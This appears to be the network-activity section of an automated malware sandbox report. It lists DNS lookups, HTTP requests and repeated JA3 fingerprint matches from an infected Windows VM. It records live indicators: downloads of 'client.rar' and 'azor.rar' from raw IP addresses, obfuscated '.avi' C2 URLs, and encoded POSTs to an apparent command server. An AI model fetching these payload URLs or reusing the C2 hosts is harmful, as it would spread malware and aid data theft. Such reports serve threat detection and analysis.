iecvlist.microsoft.com [VT] CNAME cs9.wpc.v0cdn.net [VT]
CNAME ie9comview.vo.msecnd.net [VT]
A 72.21.81.200 [VT]
resolver1.opendns.com [VT] A 208.67.222.222 [VT]
222.222.67.208.in-addr.arpa [VT] PTR resolver1.opendns.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com [VT] A 173.166.146.112 [VT]
myip.opendns.com [VT]
zindv.club [VT] A 185.139.69.88 [VT]
www.download.windowsupdate.com [VT] A 104.73.85.137 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME download.windowsupdate.com.edgesuite.net [VT]
CNAME a767.dspw65.akamai.net [VT]
pompeiiii.org [VT] A 208.91.197.91 [VT]
adsfinder.xyz [VT] A 185.158.249.39 [VT]
wpad.localdomain [VT]
qqtube.club [VT] A 109.230.199.24 [VT]
parolinos.xyz [VT] A 176.10.125.110 [VT]

HTTP Requests

URI Data
http://www.msftncsi.com/ncsi.txt
GET /ncsi.txt HTTP/1.1
Connection: Close
User-Agent: Microsoft NCSI
Host: www.msftncsi.com

http://ljeffery54ae.top/skoex/po2.php?l=cupk6.fgs
GET /skoex/po2.php?l=cupk6.fgs HTTP/1.1
Host: ljeffery54ae.top
Connection: Keep-Alive

http://ksoniay95ee.info/images/CI9BVzd6AqB/ZNUmRFBAKmX4q_/2FIAs9nQJlVF7_2BTvRU5/ZPqTgOgLDp8JzrCL/_2Fcm_2BF41yLbk/eclytPd8CmogXhag5f/iJKuzzkmf/M1zwJZUnnnK6LJcptL1S/m6Hl99BQ3fNUdtPt9So/0Zzs4gdqrhrs/_2FJr.avi
GET /images/CI9BVzd6AqB/ZNUmRFBAKmX4q_/2FIAs9nQJlVF7_2BTvRU5/ZPqTgOgLDp8JzrCL/_2Fcm_2BF41yLbk/eclytPd8CmogXhag5f/iJKuzzkmf/M1zwJZUnnnK6LJcptL1S/m6Hl99BQ3fNUdtPt9So/0Zzs4gdqrhrs/_2FJr.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive

http://ksoniay95ee.info/favicon.ico
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: PHPSESSID=suakbds203f3nv19rh1su4vuo7; lang=en

http://ksoniay95ee.info/images/zqt4lIX7/WURokuO9vh89Yy_2BsUJrS9/PjffqPwJdE/ySWjXv6UbPaKFMooy/6X5boj6wckcc/Ucw3dM3Mi_2/FznVDXGp2L3Py2/JxFQvMX4xN_2FzOJs9Vmk/BMKiWvw71S3sGLtJ/XPIlWh5f6mD5BYu/asfVMoi7/c.avi
GET /images/zqt4lIX7/WURokuO9vh89Yy_2BsUJrS9/PjffqPwJdE/ySWjXv6UbPaKFMooy/6X5boj6wckcc/Ucw3dM3Mi_2/FznVDXGp2L3Py2/JxFQvMX4xN_2FzOJs9Vmk/BMKiWvw71S3sGLtJ/XPIlWh5f6mD5BYu/asfVMoi7/c.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: lang=en

http://ksoniay95ee.info/images/k1bBds2o/QmLUr43VFSfi6mVN0k_2Fri/aRq5qJ_2Bb/9pn_2FrlWUAEwA3DA/8_2BlKV4KDN_/2B_2BLZHLEa/vLvK_2F5G0A625/hGoDuTo8Bf7h2KRBD9vOP/gcTRbqx7bC5Q89C6/6YYly9yOp3zpx2r/BwphZTlcwHbBf1/hYP.avi
GET /images/k1bBds2o/QmLUr43VFSfi6mVN0k_2Fri/aRq5qJ_2Bb/9pn_2FrlWUAEwA3DA/8_2BlKV4KDN_/2B_2BLZHLEa/vLvK_2F5G0A625/hGoDuTo8Bf7h2KRBD9vOP/gcTRbqx7bC5Q89C6/6YYly9yOp3zpx2r/BwphZTlcwHbBf1/hYP.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ksoniay95ee.info
DNT: 1
Connection: Keep-Alive
Cookie: lang=en

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://151.106.27.208/client.rar
GET /client.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 151.106.27.208
Connection: Keep-Alive
Cache-Control: no-cache

http://89.163.144.224/klansfuuerifneiferunfasd/modules/client.rar
GET /klansfuuerifneiferunfasd/modules/client.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 89.163.144.224
Connection: Keep-Alive
Cache-Control: no-cache

http://162.213.250.131/azor.rar
GET /azor.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: 162.213.250.131
Connection: Keep-Alive
Cache-Control: no-cache

http://85.114.134.49/index.php
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 85.114.134.49
Content-Length: 107
Cache-Control: no-cache

\x00\x00\x00Ep\x9d1p\x9d:p\x9d7\x11\x8b0g\xefFp\x9cGp\x9d0p\x9d7p\x9d0\x14\x8b0g\xeb@p\x9d5p\x9cGp\x9d0\x11\x8b0e\x8b0e\x8b0l\x8b0b\x8b0m\xeb&g\xeaAp\x9d:p\x9d7p\x9d2p\x9d5\x14\x8b0d\x8b0l\x8b1\x11\x8b0e\x8b0e\xeb&f\x9a&f\x9e@p\x9d0\x16
http://85.114.134.49/index.php
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 85.114.134.49
Content-Length: 6962
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
10.0.90.175 49363 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49364 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49366 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49367 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49368 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49391 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49392 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49393 109.230.199.24 qqtube.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
